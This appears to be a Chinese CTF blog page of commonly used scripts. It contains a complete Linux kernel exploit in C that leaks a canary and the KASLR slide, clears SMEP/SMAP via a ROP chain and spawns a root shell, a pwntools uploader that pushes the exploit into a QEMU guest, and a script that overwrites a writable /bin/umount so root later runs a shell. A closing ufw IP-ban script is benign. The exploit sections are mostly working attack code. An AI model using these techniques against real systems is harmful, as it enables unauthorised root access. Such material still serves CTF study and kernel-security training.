【杂项】一些常用的脚本

Kernel 解题脚本模型

这里放的是通过 ROP 改写 CR4 来 bypass SMEP 的脚本。注意：其中的内核符号地址、gadget 地址和泄露偏移都只对这道题的内核镜像有效，换内核必须重新计算；另外较新的内核会固定（pin）CR4 中的 SMEP/SMAP 位，开启 KPTI 时仅靠 swapgs; iretq 也无法正确返回用户态，使用前需在目标内核上验证。

#include <err.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

/*
 * Fake interrupt-return frame consumed by iretq, laid out in the exact
 * order the CPU pops it: rip, cs, rflags, rsp, ss.  The field order is
 * fixed by the hardware -- do not reorder.  save_status() fills it from
 * the current user context and templine() points rsp at it right before
 * executing iretq.
 */
struct trap_frame{
    void *rip;       /* user-mode resume address (set to &shell) */
    uint64_t cs;     /* user code segment selector */
    uint64_t rflags; /* saved flags, reloaded by iretq */
    void * rsp;      /* user stack pointer to resume on */
    uint64_t ss;     /* user stack segment selector */
}__attribute__((packed));
/* Global so the inline asm in templine() can reference it by symbol. */
struct trap_frame tf;

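/*
 * Kernel symbol addresses for the challenge image with KASLR disabled
 * (System.map values); main() rebases them by the leaked KASLR slide
 * before templine() calls them.  They are only valid for this exact
 * kernel build.  The explicit casts avoid the int-to-pointer-without-cast
 * diagnostic, which recent GCC releases treat as an error.
 */
uint64_t(*prepare_kernel_cred)(uint64_t cred) = (uint64_t (*)(uint64_t))0xffffffff810b9d80;
uint64_t(*commit_creds)(uint64_t cred) = (uint64_t (*)(uint64_t))0xffffffff810b99d0;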

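/*
 * Landing function for the fake iretq frame: runs in ring 3 with the
 * credentials committed by templine().  tf.rsp is a fabricated stack
 * with no return address on it, so this function must never return;
 * exit once the shell is done instead of falling off the end and
 * crashing on garbage.
 */
void shell(){
    system("/bin/sh");
    exit(0);
}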

void templine(){
    commit_creds(prepare_kernel_cred(0));
    asm(
        "movq $tf, %rsp;"
        "swapgs;"
        "iretq;"
    );
}

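/*
 * Snapshot the current user-mode segment selectors, flags and stack
 * pointer into tf, so the iretq in templine() lands back in this process
 * with rip redirected to shell().
 *
 * All four reads sit in one asm statement so the captured values come
 * from a single consistent context.  The landing stack is placed 0x1000
 * bytes below the current one and then realigned so shell() is entered
 * with rsp == 8 (mod 16), as the SysV ABI requires at function entry;
 * a misaligned entry can fault inside libc (SSE stores in system/printf),
 * which a plain `rsp - 0x1000` does not guarantee against at -O0.
 */
void save_status(){
    uintptr_t sp;
    asm volatile(
        "mov %%cs, %0;"
        "mov %%ss, %1;"
        "mov %%rsp, %3;"
        "pushfq;"
        "popq %2;"
        :"=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags), "=r"(sp)
        :
        : "memory"
    );
    /* 16-byte align, then leave the slot a call would have used for the return address. */
    sp = ((sp - 0x1000) & ~(uintptr_t)0xf) - 8;
    tf.rsp = (void *)sp;
    tf.rip = &shell;
}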


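/*
 * Exploit driver for /dev/baby:
 *   1. ioctl 0x6002 copies a kernel stack snapshot into temp (the leak);
 *   2. slot 0x009 of that snapshot holds a kernel text address and slot
 *      0x00d the stack canary of the vulnerable frame -- the KASLR slide
 *      and canary are recovered from them;
 *   3. ioctl 0x6001 writes temp back, overflowing the frame with a ROP
 *      chain that rewrites CR4 (SMEP/SMAP bits clear) and jumps to the
 *      user-mapped templine().
 * On success the kernel never returns from the second ioctl into this
 * function: templine() iretq's straight into shell().  Any failed syscall
 * exits with status 2 via err().
 *
 * Every constant here (leak offsets, gadget addresses, the CR4 value) is
 * tied to the challenge kernel image and must be re-derived for another
 * build.  Newer kernels also pin the SMEP/SMAP bits of CR4 and re-set
 * them on write, in which case the mov-cr4 gadget is not enough.
 */
int main(){
    save_status();

    uint64_t temp[0x200] = {0};
    int fd1 = open("/dev/baby", O_RDWR);
    if(fd1 < 0){
        err(2, "[*] fd1 open failed");   /* err() exits; nothing to do after it */
    }
    /* Leak: the driver fills temp with kernel stack contents. */
    if(ioctl(fd1, 0x6002, temp) < 0){
        err(2, "[*] ioctl 0x6002 (leak) failed");
    }
    for(int i = 0; i < 0x100; ++i){
        printf("[0x%03x] %#" PRIx64 "\n", i, temp[i]);
    }

    /* Value of the leaked slot when KASLR is off; the difference is the slide. */
    const uint64_t leak_no_kaslr = 0xffffffff8129b078;
    uint64_t kaslr_slide = temp[0x009] - leak_no_kaslr;
    uint64_t canary = temp[0x00d];
    uint64_t rop_mov_cr4_rdi = kaslr_slide + 0xffffffff81020300;
    uint64_t rop_pop_rdi_ret = kaslr_slide + 0xffffffff8100631d;
    /* Rebase the kernel function pointers via uintptr_t: arithmetic on a
     * function pointer is not valid C, only a GCC extension. */
    commit_creds = (uint64_t (*)(uint64_t))((uintptr_t)commit_creds + kaslr_slide);
    prepare_kernel_cred = (uint64_t (*)(uint64_t))((uintptr_t)prepare_kernel_cred + kaslr_slide);
    printf("[+]kaslr_slide         = %#" PRIx64 "\n", kaslr_slide);
    printf("[+]canary              = %#" PRIx64 "\n", canary);
    printf("[+]rop_pop_rdi_ret     = %#" PRIx64 "\n", rop_pop_rdi_ret);
    printf("[+]rop_mov_cr4_rdi     = %#" PRIx64 "\n", rop_mov_cr4_rdi);
    printf("[+]commit_creds        = %#" PRIxPTR "\n", (uintptr_t)commit_creds);
    printf("[+]prepare_kernel_cred = %#" PRIxPTR "\n", (uintptr_t)prepare_kernel_cred);

    /* Overflow payload, starting at the canary slot of the target frame. */
    size_t slot = 0x10;
    temp[slot++] = canary;             /* keep the stack protector happy */
    slot++;                            /* saved rbp: value irrelevant */
    temp[slot++] = rop_pop_rdi_ret;
    temp[slot++] = 0x6f0;              /* CR4 image with SMEP (bit 20) and SMAP (bit 21) clear */
    temp[slot++] = rop_mov_cr4_rdi;
    slot++;                            /* presumably popped by the cr4 gadget before its ret */
    temp[slot++] = (uint64_t)(uintptr_t)&templine;   /* user code, executable once SMEP is off */
    if(ioctl(fd1, 0x6001, temp) < 0){
        err(2, "[*] ioctl 0x6001 (overflow) failed");
    }
    /* Only reached if the chain did not fire. */
    close(fd1);
    return 0;
}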

Kernel 文件上传脚本

这里的脚本假设虚拟机里的 shell 是普通用户（提示符为 $ ）；如果是以 root 用户调试，把 cmd = '$ ' 改为 cmd = '# ' 即可。脚本会先在本地用 musl-gcc 静态编译 ./poc/exp.c，再经 gzip + base64 通过控制台传入虚拟机并执行。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import os
import subprocess

from pwn import *

# context.log_level = 'debug'
# Shell prompt to synchronise on: '$ ' for an unprivileged guest shell, '# ' for root.
cmd = '$ '


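def exploit(r):
    """Build ./poc/exp locally, push it into the guest over the console, run it.

    r: a pwntools tube attached to the guest shell (prompt given by ``cmd``).
    The binary is gzipped and base64-encoded so it survives a text-only
    console, written through a heredoc and decoded on the guest side.
    Raises subprocess.CalledProcessError if the compile or gzip step fails,
    instead of silently uploading a stale ./poc/exp the way an unchecked
    os.system() call would.
    """
    r.sendlineafter(cmd, 'stty -echo')
    # Static musl build: the guest initramfs typically has no glibc.
    subprocess.check_call(['musl-gcc', '-static', '-O2', './poc/exp.c', '-o', './poc/exp'])
    payload = base64.b64encode(subprocess.check_output(['gzip', '-c', './poc/exp']))
    r.sendlineafter(cmd, 'cat <<EOF > exp.gz.b64')
    # Send in 76-byte lines: a canonical-mode tty drops input past ~4095
    # bytes on a single line, which would silently corrupt a one-line blob.
    for off in range(0, len(payload), 76):
        r.sendline(payload[off:off + 76])
    r.sendline('EOF')
    r.sendlineafter(cmd, 'base64 -d exp.gz.b64 > exp.gz')
    r.sendlineafter(cmd, 'gunzip ./exp.gz')
    r.sendlineafter(cmd, 'chmod +x ./exp')
    r.sendlineafter(cmd, './exp')
    r.interactive()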


# Local QEMU target by default; swap in remote(host, port) for a live instance.
p = process('./startvm.sh', shell=True)
# p = remote('', )

exploit(p)

Kernel 利用 s 标志位文件进行提权

这里假设 /bin/umount 对普通用户可写。脚本把它覆盖成一个启动 /bin/sh 的脚本，然后执行 exit，之后才 cat /flag——由此推测真正的提权发生在 init 脚本于关机流程中以 root 身份调用 umount 时。注意 Linux 会忽略 #! 脚本上的 s 位（非属主写入文件通常也会清掉该位），所以 s 标志位本身并不是拿到 root 的原因，关键是该文件会被 root 执行。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

p = process('./startvm.sh', shell=True)
# p = remote('localhost', 1234)

# ssh_p = ssh('pwn', '121.37.167.199', port = 10022,password='pwn')
# p = ssh_p.shell()

# Replace the writable /bin/umount with a script that drops into a shell,
# then leave the session; the flag read is sent afterwards.
PROMPT = '$'
SETUP_CMDS = [
    'cd /',
    "echo '#!/bin/sh' > /bin/umount",
    "echo '/bin/sh' >> /bin/umount",
    "chmod +x /bin/umount",
    "exit",
]
for command in SETUP_CMDS:
    p.sendlineafter(PROMPT, command)
p.sendline("cat /flag")
p.interactive()
# ssh_p.close()

ban 他人 ip

两个文件:一个脚本,一个被脚本访问的 ip 列表

ban_ip.sh

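#!/bin/bash -x
# Block every address listed in ip_table (one per line) with ufw.
# Usage: ./ban_ip.sh [ip_table]
#
# The original `${line%?}` always chopped the last character of each
# entry -- correct only for CRLF files, and on an LF file it turns
# 101.133.213.44 into 101.133.213.4 (the wrong host).  Strip a trailing
# CR only if one is present.
set -u
table=${1:-ip_table}
while IFS= read -r line || [ -n "$line" ]; do
  line=${line%$'\r'}             # tolerate CRLF without eating the last digit
  line=${line%%#*}               # allow trailing "# comment"
  line=${line//[[:space:]]/}     # drop stray whitespace
  [ -z "$line" ] && continue
  # ufw evaluates rules in order: a deny appended after an existing allow
  # (e.g. "allow 22/tcp") never matches on that port.  prepend (ufw >= 0.36)
  # puts the deny first; on older ufw use `insert 1`, which unlike prepend
  # errors when the rule list is empty.
  ufw prepend deny from "$line" to any
done < "$table"
ufw reload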

ip_table

自行添加需要 ban 的 ip

101.133.213.44
47.116.106.203
47.116.108.82
